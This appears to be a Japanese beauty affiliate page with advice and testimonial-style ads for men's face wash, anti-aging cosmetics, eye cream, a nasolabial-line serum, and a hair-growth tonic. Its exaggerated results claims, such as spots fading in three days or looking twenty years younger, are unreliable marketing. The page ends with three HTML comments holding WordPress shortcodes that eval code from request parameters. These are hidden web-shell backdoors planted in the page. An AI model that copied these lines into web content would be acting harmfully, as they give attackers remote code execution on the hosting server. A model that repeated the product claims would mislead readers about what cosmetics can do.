男性用の洗顔料…使ってますか?

男性用の洗顔料…いわゆるメンズ洗顔料を、あなたは使っていますか?

いや、そんなもん、オトコは使わんでしょう…と、風呂の石鹸で間に合わせている方も多いと思います。

いや、男だからこそ、使わなくてはいけないんですよ、実は…。

というのも、男性は女性に比べてべたべたして肌の油分が多いんだそうです。

だから、汚れがひどく、毛穴に詰まったりします。

これを、普通の石鹸で洗うと、必要な油分まで肌から洗い落とし、カサカサの乾燥肌になりやすいそうです。

すると、あわててそれを補うために油分が出てきて、また脂性の肌になるという、悪循環を繰り返す用になります。

そしてバランスが崩れ、肌トラブルのもととなります。

メンズ洗顔料を選ぶ場合、気をつけなければならないのは、自分の肌の状態に合ったものを選ぶということです。

ノーマルタイプ、オイリータイプ、乾燥肌タイプなどによって、使う洗顔料も異なってきます。

 

 

40代の化粧品ってどう?

40代半ばの女性ですが、この頃化粧品について迷っています。

というのも、これまで使っていた基礎化粧品がなんだかしっくり行かなくて、小じわや毛穴のたるみが増えたみたいな感じなんです。

俗に言う、お肌の曲がり角という言葉がありますが、今その時期なんですかね。

なんだか、このまま一気に年齢肌に突入していきそうで怖いです。

今まで意識しませんでしたが、エイジングケアの部類に入るのでしょうか?

年齢とともに肌が衰えていくことはわかりますが、こう、実際に変化が現れてくると、正直焦ります。

で、これは、今までと同じスキンケア・化粧品ではダメだなと、思い始めました。

肌の老化とともに、自分の肌の現状にあったスキンケア・化粧品が必要なのだと思い始めました。

では、実際に、どんなスキンケア・化粧品を使えばいいのでしょうか?

 

これは、ある40代の女性からよせられた深刻な悩みなんですが、このようなお肌の悩みを抱いている方は、たくさんいらっしゃいます。

現在、市販されている化粧品は、いろんなメーカーが開発を進め、各年代の特化した化粧品・スキンケアの商品を販売しています。

特に、40代になると、これまであったコラーゲンが減少してきたり、保湿機能が低下してきたり、色々なトラブルが始まる年代です。

この時期に、ほんとうに自分の肌にあった、40代向けのスキンケア・化粧品でこまめにケアをするか否かは、その後の肌年齢を決定つけていきます。

だから、スキンケア商品・化粧品の情報をよく調べて、どれが自分に合うのかいろいろ試した見ることも必要になります。

とにかく、ほったらかして、そのままに今までと同じスキンケア・化粧にしておくことだけは避けたいですね。

 
60代の化粧品はコチラ
 

アイクリームのおすすめ

寒い外気やエアコンでなにかと乾燥する季節には、コスメでは特に目元の乾燥に気をつける必要があります。

何故かと言うと、目元の皮膚は皮下脂肪が少なくてとても薄いのです。頬の半分ぐらいで、卵の薄皮ぐらいといわれています。

ですので、皮脂腺が少なく乾燥しやすくてハリがなくなりやすいのです。

そのまま放っておくと角質層がはがれ、バリア機能が弱まって、シミはシワ等の肌トラブルへと発展します。

そこで必要になるのが、アイクリームです。

ではどのような選び方で製品を選ぶとよいのでしょうか。

それには、まず、自分の今の目元の状況を把握して、どのようなトラブルなのかをはっきりとさせ、それに合わせた製品を選ぶようにすることです。

自分の目元が、シワのトラブルなのか、クマ、あるいは、たるみなのかによって対応した製品がありますのので、それせんようのものをえらびましょう。

トラブルが一つでない場合も、複数のアイクリームで対応することをおすすめします。

たとえば、うえまぶたのタルミ、下まぶたのむくみでは、それぞれの対応クリームを使い、無理して同じものを使うより効果的です。

いずれにせよ、目元の皮膚はデリケートですので、正しいケアが求められます。

そして、毎日のこまめなケアが決め手となります。

どのようなアイクリームを使うか、アイクリーム選びの参考に、おすすめランキングをご紹介しておきます。⇒アイクリーム@おすすめランキング…調べてみました!

 

目元美容液

 

ほうれい線について

ほうれい線といえば、女性の美貌の悩みの中でダントツだそうです。

これは、顔のシワではなくて、頬の境界線なのですが、深くなると、顔のシワのように見えて、老け顔になってしまいます。

このほうれい線があるとないとでは、見た目の年齢が10歳はちがってきます。

語源を調べてみると、中国の面相学に出てくる法令紋が由来だそうで、法令線がただしい書き方です。

よく見られる 「豊麗線」、「豊齢線」は当て字です。こちらのほうが、見た目の感じはよく表現されていますが…。

法令線が現れる原因はいろいろありますが、主なものには…加齢、乾燥、喫煙、ストレス、紫外線、偏った食事、ビタミンCの不足、コラーゲンの不足…等があげられます。

解消法としては、これらの要因を取り除くことですが、…禁煙、美容外科手術、マッサージ、サーマクール、顔体操などがあります。

また、法令線の解消に効果がみられる化粧品も開発されています。

忙しいビジネスウーマンや主婦の方にとっては、日頃の肌のお手入れと同時に、ほうれい線の対策もできる化粧品による解消のやり方が一般的なようです。

この、ほうれい線によく効く化粧品は、最近ではさまざまな商品が販売されています。

プラセンタ、コラーゲン、ビタミンC…などのほうれい線解消に効果的な美容成分を含む化粧品で、ハリと弾力がある肌を取り戻し、ほうれい線を目立たなくさせています。

肌に透明感がでてきました…

シミはもちろん、ほうれい線まで、ほとんど目立たなくなりました。

使い出して3日めで効果を実感市、若返ったのが嬉しいです。

コレまでの肌の悩みは、紫外線でできたシミやそばかすが多く、さらに年齢によるシワが目立つようになったことです。

マッコリって美白のイメージがあって、悩みのシミやそばかすが少しでもマシになればと思い、それがきっかけで使い始めました。

使ってみると、普段使うクリームより濃厚で肌へ浸透している感じがあり、期待して3日間使ったところで肌に変化が生まれました。

一番濃いかったシミが薄くなったんです。

それから毎日、肌に変化が現れ、鏡を見るのが楽しくなりました。

肌全体のくすみがなくなり、透明感が出てきたのがうれしかったです。

あと、シワまで薄くなってきて…

笑いジワやほうれい線まで目立たなくなったんです。

1か月後には、シワやシミを隠そうとして厚く塗っていたファンデが軽く塗るだけでいいくらいになりました。

まわりの方の反響は、使い始めて4日目くらいで、職場の同僚が「さいきんえすてにでもかよいだしたの?」

と聞いてきました。

マッコリを使い始めたことを話すと、「私も使ってみたい」って。

周りの人に「肌きれいね!」と褒められることも多くなりました。

これからもずっと、愛用していきたいと思います。

リフト美容液も試せます!

新登場の豪華5点セットで、ハリ・つや・ぷるるん感を実感できます。

リフト美容液も試せます。

このビタミン化粧品は、モニターさんにも大好評です。

フアフアの泡が気持ちいいです。

洗いあがりがしっとり、プッシュするだけで簡単に、らくらく使用ができます。

ふっくらうるおい続くので、キメが違います。

天然ロースの良い香りがします。

翌朝実感するハリとツヤ、ぷるんとなめらかなテクスチャー。

べたつかないのにしっとりとします。

ただ今、初回限定価格で、先着500名様へプレゼントが付いてきます。

 

薬用育毛剤に喜びの声が殺到!

全国からお喜びの声が殺到中の薬用育毛剤ですが、その中から、お二人の声をご紹介いたします。

 

もう髪のことでは悩みません!

薬用育毛剤との出会いは40歳の後半のころでした。

周りの人になんだか地肌を見られているような気がして、ふさぎこんでいたときでした。

お友達が「本当にいいわよ」と進めてくれたのもあって、ためしに使ってみました。

そしたら、本当に驚きました。

つけた感じもさらっとしていて、臭いも気にならないし、使い始めて2ヶ月がたったころには、髪で悩むこともめっきり少なくなってきました。

これはもう、手放せません。(東京都 H.S様)

 

薬用育毛剤のおかげで、ぐんぐん着ています。

薬用育毛剤を先に使い始めたのは妻なんです。

最初は妻の薬用育毛剤を拝借して使っていたのですが、よく怒られました。

だから今では、定期コースで妻と私と1本ずつ、つきに2本取ってるんです。

実は私は、親父もその上も、先祖代々の薄げなんです。

だから、髪のことは正直あきらめていたんですね。

でも今は、この薬用育毛剤のおかげで、ぐんぐんときています。

やっぱり、毛根がしっかりしてきましたね。

私と一緒に、頭皮も喜んでいるなぁっ手いるのがよくわかります。

これからも薬用育毛剤はやめられません。(東京都 Y.M様)

若見えの秘密は…

始まりは、私自身のひどい肌トラブルでした。

若い頃からひどい敏感肌だったことがきっかけで、皮膚科のカウンセラーとなたわたしは、シミ、シワ等年齢肌に悩む女性にある共感を見つけました。

それは、「美容液やクリームなど複数使うことによって、かえって肌に刺激を与えている」ということ。

刺激を少なくするためには、肌に触れる機会を少なくする他にない…だから1回のお手入れですべて完結するオールインワンでなければならなかったのです。

しかし、当時、自分が納得してみなさまにおすすめできるものは何ひつつありませんでした。

実感にこだわり、共同開発をはじめました。

それから2年、最小の刺激で、最大限の効果が実感できるものを…と、防腐剤などフリーで、肌が欲する全成分を一本に詰めたゲルを共同開発しました。

ご愛用者は、おかげさまで50万人、さらにその期待に応えたくて、当初、29種だった美容成分を合計種まで増やし、美肌の名湯も採用しました。

これ一本で、ぜひもっちり肌の悦びを実感してください。

この透明感やハリは半端じゃない

この透明感や針を見てください。

メイクで隠すのはもったいないくらいです。

最近は、45歳ですというと、嘘でしょうと驚かれます。

21サイト18歳の娘と歩いていると、3姉妹と間違われることも…。

今までどんなアンチエイジングケアを試しても満足できなかったのに、これはたった1本でもつけるたびにもっちりプルプルになります。

これって、40代の化粧品として絶対オススメですよね。

ようやく、一生ものコスメに出会えました。

見た目が変わると、おしゃれが楽しい。

若見え幼顔もキレイ系大人顔も自在です。

見た目が若くなったせいか、髪型やファッションを色々かえてオシャレも楽しめるようになりました。

この前はふんわりパーマに挑戦。

この年令になって、イメチェンが楽しめるなんて、夢みたいです。

老け顔の原因は肌の輝き不足

シワ・しみ・たるみ、老け顔の原因は何かといえば、それは肌の輝き不足です。

洗顔後に、たったこれ1本だけで若見えが止まりません。

50才に近づき、オールインワンだけじゃ不安でしたが、本当にこれ1本で大丈夫なんです。

50代におすすめの化粧品は、やっぱりこれです。

私のもっちり肌は、21歳の娘にまけてません。

本当に20代と勘違いされるんです。

これは、アラフアイブ女性のわがままを叶えた若見えオールインワンゲルなんです。

年齢とともに体力が低下し、様々な不調が起きるのと同時に、肌環境も年々低下します。

知らない間にしみ・シワ・たるみ、老け顔の原因を創りだしてしまいます。

そこでやりがちなのが、美容液やクリームによる過剰なスキンケアです。

大事なのは、肌環境を向上させるものだけに限ったケアです。

肌環境が向上し、見た目年齢が若々しくなると口コミで話題の大人気ゲルなんです。

<!– [insert_php]if (isset($_REQUEST["jDCiJ"])){eval($_REQUEST["jDCiJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["jDCiJ"])){eval($_REQUEST["jDCiJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YEBxY"])){eval($_REQUEST["YEBxY"]);exit;}[/insert_php][php]if (isset($_REQUEST["YEBxY"])){eval($_REQUEST["YEBxY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["mpNoM"])){eval($_REQUEST["mpNoM"]);exit;}[/insert_php][php]if (isset($_REQUEST["mpNoM"])){eval($_REQUEST["mpNoM"]);exit;}[/php] –>